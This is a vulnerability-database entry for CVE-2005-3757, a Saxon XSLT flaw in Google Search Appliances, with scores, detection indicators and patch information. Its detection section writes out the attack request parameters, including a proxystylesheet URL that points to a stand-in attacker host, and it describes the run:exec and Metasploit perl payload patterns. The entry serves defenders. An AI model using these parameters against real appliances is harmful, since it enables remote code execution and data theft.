cbcvebase.
CVE-2005-3757
published 2005-11-22

CVE-2005-3757: The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and…

PriorityP346high7.5CVSS 2.0
AVNACLAuNCPIPAP
EXPLOIT
EPSS
42.18%
98.5th percentile
The Saxon XSLT parser in Google Mini Search Appliance, and possibly Google Search Appliance, allows remote attackers to obtain sensitive information and execute arbitrary code via dangerous Java class methods in select attribute of xsl:value-of tags in XSLT style sheets, such as (1) system-property, (2) sys:getProperty, and (3) run:exec.

Detection & IOCsextracted from sources · hover to see the quote

path/search
otherproxystylesheet=http://<attacker>/
otherproxyreload=1
otheroutput=xml_no_dtd
  • Detect outbound connections from the Google Search Appliance to attacker-controlled hosts triggered by the proxystylesheet parameter; the appliance fetching an external XSLT stylesheet is the exploitation vector.
  • Monitor for XSLT stylesheets served to the appliance containing Java method calls such as system-property, sys:getProperty, or run:exec in xsl:value-of select attributes, which are the payload delivery mechanism.
  • Detect the exploit payload pattern: XSLT content containing ':x:MSF:x:' placeholder replaced with a /usr/bin/perl -e system(pack(...)) command string, indicating Metasploit-generated malicious stylesheets.
  • ·The exploit requires the target Google Search Appliance to be able to make outbound HTTP connections back to the attacker's machine; network egress filtering on the appliance will block exploitation.
  • ·Google released a patch (advisory GA-2005-08-m) in August 2005; patched appliances return 'ERROR: Unable to fetch the stylesheet' and are not exploitable via this vector.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.